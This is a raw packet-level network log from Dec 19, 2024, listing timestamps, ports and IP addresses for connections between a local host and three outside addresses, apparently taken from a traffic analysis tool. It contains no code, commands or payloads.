Dec 19, 2024 08:52:40.287359953 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.287386894 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.287676096 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.287692070 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.287735939 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.288125992 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.288162947 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.288230896 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.288252115 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.288399935 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.288556099 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.288721085 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.288738012 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.288762093 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.289073944 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.289089918 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.289108992 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.289442062 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.289484024 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.289587021 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.289602041 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.289640903 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.289948940 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.290266991 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.290390968 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.290411949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.290429115 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.290472984 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.290713072 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291086912 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291132927 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.291183949 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291202068 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291244030 CET	49734	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.291249037 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.291502953 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291807890 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291915894 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.291929960 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291945934 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.291980982 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.292265892 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.292607069 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.292653084 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.292726994 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.292742968 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.292774916 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.293093920 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.293385983 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.293488026 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.293518066 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.293534040 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.293626070 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.293853045 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.294178963 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.294209957 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.294306040 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.294322968 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.294357061 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.294591904 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.294893026 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.294934988 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.295012951 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.295030117 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.295066118 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.295335054 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.295676947 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.295721054 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.295792103 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.295805931 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.295937061 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.296106100 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.296456099 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.296566010 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.296581984 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.296606064 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.296648979 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.296891928 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.297257900 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.297336102 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.297368050 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.297384024 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.297416925 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.297683954 CET	80	49731	147.45.47.15	192.168.2.4
Dec 19, 2024 08:52:40.390305042 CET	49730	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.399770021 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.491739988 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:40.695303917 CET	49731	80	192.168.2.4	147.45.47.15
Dec 19, 2024 08:52:41.387759924 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:41.387845039 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.449698925 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.449739933 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:41.450434923 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:41.450608015 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.451673985 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.499340057 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:41.824460983 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:41.824517965 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.824522972 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:41.824567080 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.824773073 CET	49739	443	192.168.2.4	104.26.12.205
Dec 19, 2024 08:52:41.824789047 CET	443	49739	104.26.12.205	192.168.2.4
Dec 19, 2024 08:52:46.281766891 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.401619911 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401628971 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401638031 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401700020 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.401802063 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401809931 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401860952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.401921034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401928902 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.401976109 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.401993036 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.402014017 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.402040005 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.402069092 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.402113914 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.402173042 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.521418095 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521440983 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521491051 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521506071 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521531105 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.521562099 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.521590948 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521617889 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521658897 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.521775007 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521831989 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.521855116 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.521939993 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.522006989 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.522026062 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.522110939 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.522113085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.522186041 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.522213936 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.522221088 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.522244930 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.522272110 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641125917 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641201019 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641207933 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641230106 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641258955 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641273022 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641341925 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641386032 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641395092 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641489029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641546011 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641555071 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641700029 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641776085 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641865969 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641925097 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.641987085 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.641994953 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642024040 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642034054 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642074108 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642082930 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642128944 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642168999 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642184019 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642191887 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642231941 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642359972 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642369032 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642443895 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642462969 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642477989 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642509937 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642525911 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642597914 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642606974 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642610073 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642679930 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642698050 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642705917 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642714024 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.642745972 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.642759085 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.760884047 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.760895014 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.760963917 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.760991096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761051893 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761111975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761121035 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761141062 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761157036 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761207104 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761224031 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761255026 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761276007 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761404037 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761415958 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761450052 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761466980 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761488914 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761502981 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761579037 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761588097 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761636972 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761697054 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761706114 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761768103 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.761858940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761868954 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.761908054 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762103081 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762113094 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762159109 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762208939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762243986 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762255907 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762288094 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762384892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762394905 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762444973 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762456894 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762464046 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762521982 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762531996 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762540102 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762578964 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762579918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762595892 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762609005 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762625933 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762654066 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762689114 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762696981 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762746096 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762773991 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762782097 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762823105 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.762896061 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762904882 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762944937 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762964964 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.762993097 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763010979 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763108015 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763117075 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763119936 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763128996 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763165951 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763184071 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763202906 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763211012 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763247967 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763250113 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763258934 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763289928 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763310909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763319016 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763339996 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763389111 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763406038 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763431072 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763432026 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763485909 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763500929 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763513088 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763526917 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763550997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763570070 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763592958 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763611078 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763634920 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763690948 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763700008 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763739109 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763741970 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763786077 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763788939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763830900 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763845921 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.763885021 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763900042 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.763972044 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764018059 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.764030933 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764039993 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764048100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764074087 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764079094 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.764081001 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764097929 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.764108896 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.764139891 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764139891 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.764147997 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764185905 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.764210939 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.764756918 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.880610943 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.880628109 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.880713940 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.880733013 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.880748034 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.880793095 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.880810022 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.880815983 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.880835056 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.880857944 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.880990028 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881004095 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881045103 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881071091 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881078959 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881092072 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881195068 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881208897 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881253958 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881310940 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881345987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881426096 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881438971 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881483078 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881529093 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881541967 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881562948 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881586075 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881627083 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881639004 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881700039 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881731033 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881759882 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:46.881767988 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.881980896 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:46.882004976 CET	15666	49737	193.3.19.151	192.168.2.4
